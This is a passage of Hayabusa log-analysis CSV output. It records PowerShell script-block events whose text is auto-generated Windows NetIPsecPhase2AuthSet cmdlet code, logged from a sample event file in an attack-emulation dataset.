$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 
$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
